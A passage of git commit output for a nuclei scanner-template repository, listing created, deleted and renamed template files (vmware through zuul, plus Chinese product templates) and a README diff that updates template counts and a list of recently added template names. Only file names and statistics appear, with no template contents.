nuclei-templates/Other/vmware-horizon-log4j-jndi-rce.yaml create mode 100644 nuclei-templates/Other/vmware-horizon-panel-11035.yaml delete mode 100644 nuclei-templates/Other/vmware-horizon-panel.yaml delete mode 100644 nuclei-templates/Other/vmware-log4j.yaml delete mode 100644 nuclei-templates/Other/vmware-vcenter-lfi-11048.yaml rename nuclei-templates/Other/{vmware-vcenter-lfi-linux-11042.yaml => vmware-vcenter-lfi-linux.yaml} (100%) create mode 100644 nuclei-templates/Other/vmware-vcenter-lfi.yaml create mode 100644 nuclei-templates/Other/vmware-vcenter-log4j-jndi-rce.yaml delete mode 100644 nuclei-templates/Other/vmware-vcenter-ssrf-11051.yaml create mode 100644 nuclei-templates/Other/vmware-vcenter-ssrf.yaml create mode 100644 nuclei-templates/Other/vmware-vsphere-web-client.yaml rename nuclei-templates/Other/{voipmonitor-workflow-11064.yaml => voipmonitor-workflow-11065.yaml} (100%) delete mode 100644 nuclei-templates/Other/voiprce(1).yaml create mode 100644 nuclei-templates/Other/vpms-auth-bypass-11066.yaml delete mode 100644 nuclei-templates/Other/vpms-auth-bypass.yaml create mode 100644 nuclei-templates/Other/vsftpd-detection-11074.yaml delete mode 100644 nuclei-templates/Other/vsftpd-detection.yaml rename nuclei-templates/Other/{w3c-total-cache-ssrf-11081.yaml => w3c-total-cache-ssrf-11077.yaml} (100%) rename nuclei-templates/Other/{wadl-api-11085.yaml => wadl-api-11082.yaml} (100%) create mode 100644 nuclei-templates/Other/wago-plc-panel-11093.yaml delete mode 100644 nuclei-templates/Other/wago-plc-panel.yaml create mode 100644 nuclei-templates/Other/wallix-accessmanager-panel-11095.yaml delete mode 100644 nuclei-templates/Other/wallix-accessmanager-panel.yaml delete mode 100644 nuclei-templates/Other/wamp-xdebug-detect-11104.yaml create mode 100644 nuclei-templates/Other/wamp-xdebug-detect.yaml rename nuclei-templates/Other/{wangkang-ns-asg-rce-2.yaml => wangkang-NS-ASG-rce-2.yaml} (100%) rename nuclei-templates/Other/{wangkang-NGFW-rce.yaml => wangkang-ngfw-rce.yaml} (100%) delete mode 100644 nuclei-templates/Other/watchguard-credentials-disclosure-11107.yaml create mode 100644 nuclei-templates/Other/watchguard-credentials-disclosure.yaml create mode 100644 nuclei-templates/Other/watchguard-panel-11108.yaml delete mode 100644 nuclei-templates/Other/watchguard-panel.yaml create mode 100644 nuclei-templates/Other/wazuh-detect-11111.yaml delete mode 100644 nuclei-templates/Other/wazuh-detect-11112.yaml create mode 100644 nuclei-templates/Other/wazuh-panel-11113.yaml delete mode 100644 nuclei-templates/Other/wazuh-panel.yaml create mode 100644 nuclei-templates/Other/web-config-11126.yaml delete mode 100644 nuclei-templates/Other/web-config-11127.yaml create mode 100644 nuclei-templates/Other/web-ftp-detect-11138.yaml delete mode 100644 nuclei-templates/Other/web-ftp-detect.yaml create mode 100644 nuclei-templates/Other/web-suite-detect-11168.yaml delete mode 100644 nuclei-templates/Other/web-suite-detect.yaml delete mode 100644 nuclei-templates/Other/webcamxp-5-11122.yaml create mode 100644 nuclei-templates/Other/webcamxp-5.yaml rename nuclei-templates/Other/{webeditors-11128.yaml => webeditors-11130.yaml} (100%) create mode 100644 nuclei-templates/Other/webflow-takeover-11133.yaml delete mode 100644 nuclei-templates/Other/webflow-takeover-11134.yaml rename nuclei-templates/Other/{weblogic-detect-11142.yaml => weblogic-detect-11144.yaml} (100%) create mode 100644 nuclei-templates/Other/weblogic-iiop-detect-11147.yaml delete mode 100644 nuclei-templates/Other/weblogic-iiop-detect-11148.yaml delete mode 100644 nuclei-templates/Other/weblogic-login-11149.yaml create mode 100644 nuclei-templates/Other/weblogic-login.yaml delete mode 100644 nuclei-templates/Other/weblogic-t3-detect-11151.yaml create mode 100644 nuclei-templates/Other/weblogic-t3-detect.yaml rename nuclei-templates/Other/{webmin-panel-11158.yaml => webmin-panel.yaml} (100%) create mode 100644 nuclei-templates/Other/webmodule-ee-11162.yaml delete mode 100644 nuclei-templates/Other/webmodule-ee-11164.yaml create mode 100644 nuclei-templates/Other/webmodule-ee-panel-11161.yaml delete mode 100644 nuclei-templates/Other/webmodule-ee-panel.yaml rename nuclei-templates/Other/{Webtalk-leakage.yaml => webtalk-leakage.yaml} (100%) create mode 100644 nuclei-templates/Other/webtools-home-11169.yaml delete mode 100644 nuclei-templates/Other/webtools-home.yaml delete mode 100644 nuclei-templates/Other/webui-rce-11170.yaml create mode 100644 nuclei-templates/Other/webui-rce-11172.yaml delete mode 100644 nuclei-templates/Other/webview-addjavascript-interface-11175.yaml create mode 100644 nuclei-templates/Other/webview-addjavascript-interface-11177.yaml rename nuclei-templates/Other/{webview-load-url-11181.yaml => webview-load-url-11182.yaml} (100%) delete mode 100644 nuclei-templates/Other/webview-universal-access-11185.yaml create mode 100644 nuclei-templates/Other/webview-universal-access.yaml create mode 100644 nuclei-templates/Other/weekender-newspaper-open-redirect-11188.yaml delete mode 100644 nuclei-templates/Other/weekender-newspaper-open-redirect.yaml create mode 100644 nuclei-templates/Other/weiphp-sql-injection-11189.yaml delete mode 100644 nuclei-templates/Other/weiphp-sql-injection.yaml create mode 100644 nuclei-templates/Other/wems-manager-xss-11192.yaml delete mode 100644 nuclei-templates/Other/wems-manager-xss-11194.yaml create mode 100644 nuclei-templates/Other/wildfly-panel-11209.yaml delete mode 100644 nuclei-templates/Other/wildfly-panel.yaml rename nuclei-templates/Other/{window-name-domxss-11213.yaml => window-name-domxss.yaml} (100%) create mode 100644 nuclei-templates/Other/wix-takeover-11219.yaml delete mode 100644 nuclei-templates/Other/wix-takeover.yaml rename nuclei-templates/Other/{wondercms-detect-11223.yaml => wondercms-detect.yaml} (100%) delete mode 100644 nuclei-templates/Other/wooyun-2015-148227-11225.yaml create mode 100644 nuclei-templates/Other/wooyun-path-traversal-11229.yaml delete mode 100644 nuclei-templates/Other/wooyun-path-traversal.yaml create mode 100644 nuclei-templates/Other/wordpress-LFI.yaml delete mode 100644 nuclei-templates/Other/wordpress-accessible-wpconfig-11234.yaml create mode 100644 nuclei-templates/Other/wordpress-accessible-wpconfig-11235.yaml delete mode 100644 nuclei-templates/Other/wordpress-bbpress-plugin-listing-11245.yaml create mode 100644 nuclei-templates/Other/wordpress-bbpress-plugin-listing.yaml delete mode 100644 nuclei-templates/Other/wordpress-debug-log-11259.yaml create mode 100755 nuclei-templates/Other/wordpress-debug-log.yaml delete mode 100644 nuclei-templates/Other/wordpress-detect-11261.yaml create mode 100644 nuclei-templates/Other/wordpress-detect.yaml delete mode 100644 nuclei-templates/Other/wordpress-directory-listing-11265.yaml create mode 100644 nuclei-templates/Other/wordpress-directory-listing-11266.yaml delete mode 100644 nuclei-templates/Other/wordpress-emails-verification-for-woocommerce-1.yaml delete mode 100644 nuclei-templates/Other/wordpress-emergency-script-11277.yaml create mode 100644 nuclei-templates/Other/wordpress-emergency-script.yaml delete mode 100644 nuclei-templates/Other/wordpress-gtranslate-plugin-listing-11282.yaml create mode 100644 nuclei-templates/Other/wordpress-gtranslate-plugin-listing-11284.yaml delete mode 100644 nuclei-templates/Other/wordpress-infinitewp-auth-bypass-11285.yaml create mode 100644 nuclei-templates/Other/wordpress-infinitewp-auth-bypass-11288.yaml delete mode 100644 nuclei-templates/Other/wordpress-installer-log-11290.yaml create mode 100644 nuclei-templates/Other/wordpress-installer-log.yaml delete mode 100644 nuclei-templates/Other/wordpress-lfi.yaml create mode 100644 nuclei-templates/Other/wordpress-plugins-detect.yaml delete mode 100644 nuclei-templates/Other/wordpress-plugins2.yaml delete mode 100644 nuclei-templates/Other/wordpress-rce-simplefilelist-11302.yaml create mode 100644 nuclei-templates/Other/wordpress-rce-simplefilelist-11304.yaml create mode 100644 nuclei-templates/Other/wordpress-rdf-user-enum.yaml delete mode 100644 nuclei-templates/Other/wordpress-redirection-plugin-listing-11306.yaml create mode 100644 nuclei-templates/Other/wordpress-redirection-plugin-listing-11308.yaml delete mode 100644 nuclei-templates/Other/wordpress-takeover-11312.yaml create mode 100644 nuclei-templates/Other/wordpress-takeover-11313.yaml rename nuclei-templates/Other/{wordpress-themes2.yaml => wordpress-themes-detect-11316.yaml} (100%) create mode 100644 nuclei-templates/Other/wordpress-user-enum-11330.yaml delete mode 100644 nuclei-templates/Other/wordpress-user-enum.yaml delete mode 100644 nuclei-templates/Other/wordpress-user-enumeration-11329.yaml create mode 100644 nuclei-templates/Other/wordpress-user-enumeration.yaml create mode 100644 nuclei-templates/Other/wordpress-weak-credentials-11334.yaml delete mode 100644 nuclei-templates/Other/wordpress-weak-credentials.yaml create mode 100644 nuclei-templates/Other/wordpress-woocommerce-listing-11339.yaml delete mode 100644 nuclei-templates/Other/wordpress-woocommerce-listing-11341.yaml delete mode 100644 nuclei-templates/Other/wordpress-woocommerce-sqli-11345.yaml create mode 100644 nuclei-templates/Other/wordpress-woocommerce-sqli.yaml delete mode 100644 nuclei-templates/Other/wordpress-wordfence-waf-bypass-xss-11353.yaml create mode 100644 nuclei-templates/Other/wordpress-wordfence-waf-bypass-xss-11356.yaml delete mode 100644 nuclei-templates/Other/wordpress-wordfence-xss-11357.yaml create mode 100644 nuclei-templates/Other/wordpress-wordfence-xss-11362.yaml delete mode 100644 nuclei-templates/Other/wordpress-wpcourses-info-disclosure-11371.yaml create mode 100644 nuclei-templates/Other/wordpress-wpcourses-info-disclosure.yaml rename nuclei-templates/Other/{wordpress-xmlrpc-listmethods.yaml => wordpress-xmlrpc-listmethods-11372.yaml} (100%) create mode 100644 nuclei-templates/Other/wordpress-zebra-form-xss-11375.yaml delete mode 100644 nuclei-templates/Other/wordpress-zebra-form-xss-11377.yaml delete mode 100644 nuclei-templates/Other/workresources-rdp-11382.yaml create mode 100644 nuclei-templates/Other/workresources-rdp.yaml rename nuclei-templates/Other/{worksites-detection-11384.yaml => worksites-detection-11383.yaml} (100%) create mode 100644 nuclei-templates/Other/wowza-streaming-engine-11395.yaml delete mode 100644 nuclei-templates/Other/wowza-streaming-engine-11398.yaml rename nuclei-templates/Other/{wp-altair-listing-11405.yaml => wp-altair-listing-11406.yaml} (100%) create mode 100644 nuclei-templates/Other/wp-app-log-11413.yaml delete mode 100644 nuclei-templates/Other/wp-app-log.yaml rename nuclei-templates/Other/{wp-arforms-listing.yaml => wp-arforms-listing-11415.yaml} (100%) create mode 100644 nuclei-templates/Other/wp-church-admin-xss-11419.yaml delete mode 100644 nuclei-templates/Other/wp-church-admin-xss-11420.yaml delete mode 100644 nuclei-templates/Other/wp-code-snippets-xss-11425.yaml create mode 100644 nuclei-templates/Other/wp-code-snippets-xss-11426.yaml create mode 100644 nuclei-templates/Other/wp-config-setup-11427.yaml delete mode 100644 nuclei-templates/Other/wp-config-setup.yaml create mode 100644 nuclei-templates/Other/wp-custom-tables-xss-11433.yaml delete mode 100644 nuclei-templates/Other/wp-custom-tables-xss-11434.yaml delete mode 100644 nuclei-templates/Other/wp-detect (copy 1).yaml create mode 100644 nuclei-templates/Other/wp-detect.yaml rename nuclei-templates/Other/{wp-email-subscribers-listing-11440.yaml => wp-email-subscribers-listing-11443.yaml} (100%) delete mode 100644 nuclei-templates/Other/wp-engine-config.yaml create mode 100644 nuclei-templates/Other/wp-flagem-xss-11453.yaml delete mode 100644 nuclei-templates/Other/wp-flagem-xss.yaml rename nuclei-templates/Other/{wp-full-path-disclosure-11457.yaml => wp-full-path-disclosure.yaml} (100%) delete mode 100644 nuclei-templates/Other/wp-haberadam-idor-11467.yaml create mode 100644 nuclei-templates/Other/wp-haberadam-idor-11468.yaml rename nuclei-templates/Other/{wp-install-11475.yaml => wp-install.yaml} (100%) delete mode 100644 nuclei-templates/Other/wp-javospot-lfi-11480.yaml create mode 100644 nuclei-templates/Other/wp-javospot-lfi-11482.yaml create mode 100644 nuclei-templates/Other/wp-mailchimp-log-exposure-11492.yaml delete mode 100644 nuclei-templates/Other/wp-mailchimp-log-exposure-11494.yaml delete mode 100644 nuclei-templates/Other/wp-misconfig.yaml delete mode 100644 nuclei-templates/Other/wp-mstore-plugin-listing-11501.yaml create mode 100644 nuclei-templates/Other/wp-mstore-plugin-listing.yaml delete mode 100644 nuclei-templates/Other/wp-nextgen-xss-11516.yaml create mode 100644 nuclei-templates/Other/wp-nextgen-xss-11518.yaml create mode 100644 nuclei-templates/Other/wp-oxygen-theme-lfi-11522.yaml delete mode 100644 nuclei-templates/Other/wp-oxygen-theme-lfi-11523.yaml delete mode 100644 nuclei-templates/Other/wp-phpfreechat-xss-11527.yaml create mode 100644 nuclei-templates/Other/wp-phpfreechat-xss-11528.yaml create mode 100644 nuclei-templates/Other/wp-plugin-lifterlms-11533.yaml delete mode 100644 nuclei-templates/Other/wp-plugin-lifterlms.yaml create mode 100644 nuclei-templates/Other/wp-plugin-marmoset-viewer-xss-11537.yaml delete mode 100644 nuclei-templates/Other/wp-plugin-marmoset-viewer-xss-11538.yaml delete mode 100644 nuclei-templates/Other/wp-plugin-utlimate-member-11539.yaml create mode 100644 nuclei-templates/Other/wp-plugin-utlimate-member-11541.yaml rename nuclei-templates/Other/{wp-prostore-open-redirect-11548.yaml => wp-prostore-open-redirect-11549.yaml} (100%) create mode 100644 nuclei-templates/Other/wp-qards-listing-11551.yaml delete mode 100644 nuclei-templates/Other/wp-qards-listing-11552.yaml create mode 100644 nuclei-templates/Other/wp-securimage-xss-11556.yaml delete mode 100644 nuclei-templates/Other/wp-securimage-xss.yaml create mode 100644 nuclei-templates/Other/wp-security-open-redirect-11561.yaml delete mode 100644 nuclei-templates/Other/wp-security-open-redirect.yaml create mode 100644 nuclei-templates/Other/wp-slideshow-xss-11575.yaml delete mode 100644 nuclei-templates/Other/wp-slideshow-xss-11576.yaml delete mode 100644 nuclei-templates/Other/wp-socialfit-xss-11580.yaml create mode 100644 nuclei-templates/Other/wp-socialfit-xss-11581.yaml rename nuclei-templates/Other/{wp-super-forms-11587.yaml => wp-super-forms-11585.yaml} (100%) create mode 100644 nuclei-templates/Other/wp-tinymce-lfi-11589.yaml delete mode 100644 nuclei-templates/Other/wp-tinymce-lfi-11591.yaml delete mode 100644 nuclei-templates/Other/wp-tutor-lfi-11598.yaml create mode 100644 nuclei-templates/Other/wp-tutor-lfi.yaml create mode 100755 nuclei-templates/Other/wp-upload-data-11602.yaml delete mode 100644 nuclei-templates/Other/wp-upload-data-11605.yaml create mode 100644 nuclei-templates/Other/wp-userenum.yaml delete mode 100644 nuclei-templates/Other/wp-vault-lfi-11611.yaml delete mode 100644 nuclei-templates/Other/wp-whmcs-xss-11614.yaml create mode 100644 nuclei-templates/Other/wp-whmcs-xss.yaml create mode 100644 nuclei-templates/Other/wp-woocommerce-email-verification-1.yaml create mode 100644 nuclei-templates/Other/wp-woocommerce-email-verification-11616.yaml delete mode 100644 nuclei-templates/Other/wp-woocommerce-email-verification-11619.yaml rename nuclei-templates/Other/{wp-xmlrpc-brute-force-11624.yaml => wp-xmlrpc-brute-force.yaml} (100%) create mode 100644 nuclei-templates/Other/wpdm-cache-session-11438.yaml delete mode 100644 nuclei-templates/Other/wpdm-cache-session-11439.yaml create mode 100644 nuclei-templates/Other/wpengine-config-check.yaml create mode 100644 nuclei-templates/Other/wpmudev-my-calender-xss-11502.yaml delete mode 100644 nuclei-templates/Other/wpmudev-my-calender-xss-11503.yaml delete mode 100644 nuclei-templates/Other/wpmudev-pub-keys-11507.yaml create mode 100644 nuclei-templates/Other/wpmudev-pub-keys.yaml rename nuclei-templates/Other/{wptouch-open-redirect-11592.yaml => wptouch-open-redirect-11594.yaml} (100%) delete mode 100644 nuclei-templates/Other/wptouch-plugin-open-redirect.yaml create mode 100644 nuclei-templates/Other/wsdl-api-11632.yaml delete mode 100644 nuclei-templates/Other/wsdl-api.yaml delete mode 100644 nuclei-templates/Other/wso2-2019-0598-11635.yaml create mode 100644 nuclei-templates/Other/wso2-2019-0598-11636.yaml rename nuclei-templates/Other/{wso2-apimanager-detect-11639.yaml => wso2-apimanager-detect-11638.yaml} (100%) create mode 100644 nuclei-templates/Other/wso2-default-login-11641.yaml delete mode 100644 nuclei-templates/Other/wso2-default-login-11643.yaml create mode 100644 nuclei-templates/Other/wso2-management-console-11644.yaml delete mode 100644 nuclei-templates/Other/wso2-management-console.yaml create mode 100644 nuclei-templates/Other/wufoo-takeover-11649.yaml delete mode 100644 nuclei-templates/Other/wufoo-takeover-11651.yaml rename nuclei-templates/Other/{wuzhicms-detect-11654.yaml => wuzhicms-detect-11655.yaml} (100%) create mode 100644 nuclei-templates/Other/wuzhicms-sqli-11658.yaml delete mode 100644 nuclei-templates/Other/wuzhicms-sqli.yaml create mode 100644 nuclei-templates/Other/xdcms-sqli-11667.yaml delete mode 100644 nuclei-templates/Other/xdcms-sqli.yaml rename nuclei-templates/Other/{xenforo-login-11673.yaml => xenforo-login.yaml} (100%) delete mode 100644 nuclei-templates/Other/xenmobile-login-11675.yaml create mode 100644 nuclei-templates/Other/xenmobile-login.yaml create mode 100644 nuclei-templates/Other/xerox-efi-lfi-11681.yaml delete mode 100644 nuclei-templates/Other/xerox-efi-lfi.yaml create mode 100644 nuclei-templates/Other/xerox7-default-login-11680.yaml delete mode 100644 nuclei-templates/Other/xerox7-default-login.yaml create mode 100644 nuclei-templates/Other/xmlrpc-pingback-ssrf-11687.yaml delete mode 100644 nuclei-templates/Other/xmlrpc-pingback-ssrf.yaml rename nuclei-templates/Other/{fuzzing-xss-get-params-html-injection.yaml => xss-fuzz-html-tag-injection.yaml} (100%) create mode 100644 nuclei-templates/Other/xss-fuzz.yaml delete mode 100644 nuclei-templates/Other/xvr-login-11702.yaml create mode 100644 nuclei-templates/Other/xvr-login-11705.yaml create mode 100644 nuclei-templates/Other/xxljob-default-login-11712.yaml delete mode 100644 nuclei-templates/Other/xxljob-default-login-11714.yaml rename nuclei-templates/Other/{yapi-detect-11720.yaml => yapi-detect-11719.yaml} (100%) rename nuclei-templates/Other/{yapi-rce-11724.yaml => yapi-rce-11725.yaml} (100%) delete mode 100644 nuclei-templates/Other/yarn-lock-11728.yaml create mode 100644 nuclei-templates/Other/yarn-lock-11729.yaml create mode 100644 nuclei-templates/Other/yarn-manager-exposure-11731.yaml delete mode 100644 nuclei-templates/Other/yarn-manager-exposure-11733.yaml create mode 100644 nuclei-templates/Other/yarn-resourcemanager-rce-11734.yaml delete mode 100644 nuclei-templates/Other/yarn-resourcemanager-rce-11735.yaml delete mode 100644 nuclei-templates/Other/yii-debugger-11739.yaml create mode 100644 nuclei-templates/Other/yii-debugger-11740.yaml rename nuclei-templates/Other/{yongyou-eltextfile.yaml => yongyou-ELTextFile.yaml} (100%) delete mode 100644 nuclei-templates/Other/yongyou-icurrtype-sqli.yaml create mode 100644 nuclei-templates/Other/yongyou-jdbcRead.yaml create mode 100644 nuclei-templates/Other/yongyou-ssrf-11745.yaml delete mode 100644 nuclei-templates/Other/yongyou-ssrf.yaml rename nuclei-templates/Other/{yongyou-u8-RegisterServlet-sql-Injection.yaml => yonyou-u8-registerservlet-sqli.yaml} (100%) rename nuclei-templates/Other/{yonyou-nc-cloud-ncchr-attachment-uploadChunk-fileupload.yaml => yonyou_nc_cloud_ncchr_attachment_uploadchunk_upload.yaml} (100%) delete mode 100644 nuclei-templates/Other/yopass-panel-11749.yaml create mode 100644 nuclei-templates/Other/yopass-panel.yaml rename nuclei-templates/Other/{yunxintong-fileread.yaml => yunxintong-fileRead.yaml} (100%) delete mode 100644 nuclei-templates/Other/zabbix-default-credentials-11758.yaml create mode 100644 nuclei-templates/Other/zabbix-default-credentials.yaml delete mode 100644 nuclei-templates/Other/zabbix-error-11764.yaml create mode 100644 nuclei-templates/Other/zabbix-error-11766.yaml delete mode 100644 nuclei-templates/Other/zabbix-server-login-11767.yaml create mode 100644 nuclei-templates/Other/zabbix-server-login.yaml delete mode 100644 nuclei-templates/Other/zcms-v3-sqli-11773.yaml create mode 100644 nuclei-templates/Other/zcms-v3-sqli.yaml create mode 100644 nuclei-templates/Other/zend-config-file-11778.yaml delete mode 100644 nuclei-templates/Other/zend-config-file.yaml create mode 100644 nuclei-templates/Other/zendesk-takeover-11781.yaml delete mode 100644 nuclei-templates/Other/zendesk-takeover-11783.yaml delete mode 100644 nuclei-templates/Other/zenphoto-installation-sensitive-info.yaml create mode 100644 nuclei-templates/Other/zenphoto-sensitive-info.yaml rename nuclei-templates/Other/{zentao-detect-11785.yaml => zentao-detect-11787.yaml} (100%) delete mode 100644 nuclei-templates/Other/zhiyuan-file-upload-11791.yaml create mode 100644 nuclei-templates/Other/zhiyuan-file-upload-11794.yaml rename nuclei-templates/Other/{zhiyuan-oa-unauthorized-11806.yaml => zhiyuan-oa-unauthorized-11808.yaml} (100%) rename nuclei-templates/Other/{zimbra-preauth-ssrf-11810.yaml => zimbra-preauth-ssrf.yaml} (100%) delete mode 100644 nuclei-templates/Other/zimbra-web-client-11814.yaml create mode 100644 nuclei-templates/Other/zimbra-web-client.yaml create mode 100644 nuclei-templates/Other/zip-backup-files-11815.yaml delete mode 100644 nuclei-templates/Other/zip-backup-files-11818.yaml create mode 100644 nuclei-templates/Other/zm-system-log-detect-11833.yaml delete mode 100644 nuclei-templates/Other/zm-system-log-detect-11834.yaml rename nuclei-templates/Other/{zuul-panel-11842.yaml => zuul-panel.yaml} (100%) create mode 100644 "nuclei-templates/Other/\344\270\234\346\226\271\351\200\232tongweb\345\272\224\347\224\250\346\234\215\345\212\241\345\231\250.yaml" create mode 100644 "nuclei-templates/Other/\344\272\221\346\227\266\347\251\272\347\244\276\344\274\232\345\214\226\345\225\206\344\270\232erp\347\263\273\347\273\237.yaml" create mode 100644 "nuclei-templates/Other/\344\274\201\346\234\233\345\210\266\351\200\240erp\347\263\273\347\273\237.yaml" create mode 100644 "nuclei-templates/Other/\345\244\247\345\215\216\346\231\272\350\203\275\347\211\251\350\201\224icc\347\273\274\345\220\210\347\256\241\347\220\206\345\271\263\345\217\260.yaml" create mode 100644 "nuclei-templates/Other/\345\244\251\351\227\256\347\211\251\344\270\232erp\347\263\273\347\273\237.yaml" create mode 100644 "nuclei-templates/Other/\345\245\245\345\250\201\344\272\232\350\247\206\345\261\217\344\272\221\345\271\263\345\217\260.yaml" create mode 100644 "nuclei-templates/Other/\345\256\207\350\247\206vs-isc5000-e.yaml" create mode 100644 "nuclei-templates/Other/\345\270\206\350\275\257\346\212\245\350\241\250.yaml" create mode 100644 "nuclei-templates/Other/\345\270\206\350\275\257\346\225\260\346\215\256\345\206\263\347\255\226\347\263\273\347\273\237.yaml" create mode 100644 "nuclei-templates/Other/\345\271\277\350\201\224\350\276\276oa.yaml" create mode 100644 "nuclei-templates/Other/\345\276\256\345\256\217oa.yaml" create mode 100644 "nuclei-templates/Other/\346\205\247\347\202\271oa.yaml" create mode 100644 "nuclei-templates/Other/\346\213\223\345\260\224\346\200\235sso.yaml" create mode 100644 "nuclei-templates/Other/\346\213\223\345\260\224\346\200\235was.yaml" create mode 100644 "nuclei-templates/Other/\346\214\207\346\216\214\346\230\223.yaml" create mode 100644 "nuclei-templates/Other/\346\261\211\345\276\227srm\344\272\221\345\271\263\345\217\260.yaml" create mode 100644 "nuclei-templates/Other/\346\263\233\345\276\256-oa e-cology8.yaml" create mode 100644 "nuclei-templates/Other/\346\263\233\346\231\256\345\273\272\347\255\221\345\267\245\347\250\213\346\226\275\345\267\245oa.yaml" create mode 100644 "nuclei-templates/Other/\346\265\267\347\277\224\344\272\221\345\271\263\345\217\260.yaml" create mode 100644 "nuclei-templates/Other/\347\221\236\345\217\213\345\272\224\347\224\250\350\231\232\346\213\237\345\214\226\347\263\273\347\273\237.yaml" create mode 100644 "nuclei-templates/Other/\347\224\250\345\217\213-fe\345\215\217\344\275\234\345\212\236\345\205\254\345\271\263\345\217\260.yaml" create mode 100644 "nuclei-templates/Other/\347\224\250\345\217\213\350\207\264\350\277\234a6\345\215\217\345\220\214\345\212\236\345\205\254\350\275\257\344\273\266.yaml" create mode 100644 "nuclei-templates/Other/\350\207\264\350\277\234a6-m\345\215\217\345\220\214\347\256\241\347\220\206\350\275\257\344\273\266.yaml" create mode 100644 "nuclei-templates/Other/\350\207\264\350\277\234a6-s\345\215\217\345\220\214\347\256\241\347\220\206\350\275\257\344\273\266.yaml" create mode 100644 "nuclei-templates/Other/\350\207\264\350\277\234a6s\345\215\217\345\220\214\347\256\241\347\220\206\350\275\257\344\273\266.yaml" create mode 100644 "nuclei-templates/Other/\350\207\264\350\277\234a8-m\344\274\201\344\270\232\351\233\206\345\233\242\347\211\210.yaml" create mode 100644 "nuclei-templates/Other/\350\207\264\350\277\234a8-v5\345\215\217\345\220\214\347\256\241\347\220\206\350\275\257\344\273\266.yaml" create mode 100644 "nuclei-templates/Other/\350\207\264\350\277\234a8n.yaml" create mode 100644 "nuclei-templates/Other/\350\207\264\350\277\234g6-n\345\244\232\347\273\204\347\273\207\347\211\210.yaml" create mode 100644 "nuclei-templates/Other/\350\207\264\350\277\234g6-sc\345\244\232\347\273\204\347\273\207\347\211\210.yaml" create mode 100644 "nuclei-templates/Other/\350\207\264\350\277\234\345\215\217\345\210\233a6\345\215\217\345\220\214\345\212\236\345\205\254\350\275\257\344\273\266.yaml" create mode 100644 "nuclei-templates/Other/\351\207\221\350\235\266apusic\345\272\224\347\224\250\346\234\215\345\212\241\345\231\250.yaml" create mode 100644 "nuclei-templates/Other/\351\223\255\351\243\236mcms.yaml" diff --git a/README.md b/README.md index f6dbba4121..376f0547c0 100644 --- a/README.md +++ b/README.md @@ -21,53 +21,117 @@ | CVE-2017 | 395 | | CVE-2018 | 445 | | CVE-2019 | 511 | -| CVE-2020 | 592 | -| CVE-2021 | 1731 | +| CVE-2020 | 591 | +| CVE-2021 | 1732 | | CVE-2022 | 2456 | -| CVE-2023 | 4724 | -| CVE-2024 | 4295 | -| Other | 23673 | +| CVE-2023 | 4723 | +| CVE-2024 | 4335 | +| Other | 23731 | ## 近几天数量变化情况 -|2024-08-02 | 2024-08-03 | 2024-08-04 | 2024-08-05 | 2024-08-06 | 2024-08-07 | 2024-08-08| +|2024-08-03 | 2024-08-04 | 2024-08-05 | 2024-08-06 | 2024-08-07 | 2024-08-08 | 2024-08-09| |--- | ------ | ------ | ------ | ------ | ------ | ---| -|40680 | 40674 | 40708 | 40712 | 40706 | 40721 | 40790| +|40674 | 40708 | 40712 | 40706 | 40721 | 40790 | 40887| ## 最近新增文件 | templates name | | --- | -| PeopleSoft-XXE-1.yaml | -| Jenkins-RCE.yaml | -| hikvision-detection-1.yaml | -| sensitive-storage-data-exposure-3.yaml | -| sensitive-storage-data-exposure-6.yaml | -| OpenTSDB-RCE-1.yaml | -| ApacheSolr-SSRF-1.yaml | -| ApacheSolr-SSRF-6.yaml | -| sensitive-storage-data-exposure-2.yaml | -| exposed-nomad-7329.yaml | -| ApacheStruts-RCE.yaml | -| ApacheSolr-SSRF-4.yaml | -| Confluence-SSRF.yaml | -| ApacheSolr-SSRF-5.yaml | -| PeopleSoft-XXE-2.yaml | -| php-proxy-detect-1.yaml | -| ApacheSolr-SSRF-2.yaml | -| ApacheSolr-SSRF-3.yaml | -| Shellshock-RCE-1.yaml | -| sensitive-storage-data-exposure-5.yaml | -| JBoss-SSRF.yaml | -| OpenTSDB-RCE-2.yaml | -| sensitive-storage-data-exposure-1.yaml | -| sensitive-storage-data-exposure-4.yaml | -| CVE-2023-0285.yaml | -| CVE-2023-47238.yaml | -| cve-2020-4463.yaml | -| CVE-2020-29164.yaml | -| CVE-2020-11034.yaml | -| CVE-2020-14179.yaml | -| CVE-2024-6522.yaml | -| cve-2024-3400.yaml | -| CVE-2024-7355.yaml | -| CVE-2024-7353.yaml | -| CVE-2022-1617.yaml | -| cve-2021-32030.yaml | -| cve-2021-28918.yaml | +| sysaid-help-desk.yaml | +| 帆软数据决策系统.yaml | +| dahua-智慧园区综合管理平台.yaml | +| panabit-panalog.yaml | +| 天问物业erp系统.yaml | +| 致远a8n.yaml | +| tin-canny-learndash-reporting.yaml | +| 东方通tongweb应用服务器.yaml | +| 金蝶apusic应用服务器.yaml | +| 致远a6s协同管理软件.yaml | +| 大华智能物联icc综合管理平台.yaml | +| 瑞友应用虚拟化系统.yaml | +| news-flash.yaml | +| inspur-政务系统.yaml | +| tos.yaml | +| 宇视vs-isc5000-e.yaml | +| 拓尔思was.yaml | +| multipurpose.yaml | +| 企望制造erp系统.yaml | +| 奥威亚视屏云平台.yaml | +| dokmee ecm.yaml | +| netflow-analyzer-zoho-traffic-management.yaml | +| the-next.yaml | +| 帆软报表.yaml | +| apollo-adminservice.yaml | +| kubio.yaml | +| kingdee-eas.yaml | +| 致远a6-s协同管理软件.yaml | +| h3c secpath 运维审计系统.yaml | +| Cache_to_xss.yaml | +| 致远协创a6协同办公软件.yaml | +| 海翔云平台.yaml | +| 泛普建筑工程施工oa.yaml | +| 致远g6-n多组织版.yaml | +| nagios-status-page-3.yaml | +| readynas_surveillance.yaml | +| 广联达oa.yaml | +| 致远a8-v5协同管理软件.yaml | +| 用友致远a6协同办公软件.yaml | +| 铭飞mcms.yaml | +| linkerd-service-detect.yaml | +| 云时空社会化商业erp系统.yaml | +| casbin.yaml | +| 致远g6-sc多组织版.yaml | +| 微宏oa.yaml | +| tamronos iptv系统.yaml | +| kingdee产品.yaml | +| 致远a6-m协同管理软件.yaml | +| orchid-store.yaml | +| 拓尔思sso.yaml | +| 慧点oa.yaml | +| cf7-message-filter.yaml | +| 指掌易.yaml | +| 泛微-oa e-cology8.yaml | +| openrefine.yaml | +| vmware-vsphere-web-client.yaml | +| 致远a8-m企业集团版.yaml | +| officeweb365.yaml | +| 用友-fe协作办公平台.yaml | +| 汉得srm云平台.yaml | +| cve-2017-7615.yaml | +| CVE-2024-39646.yaml | +| CVE-2024-6987.yaml | +| 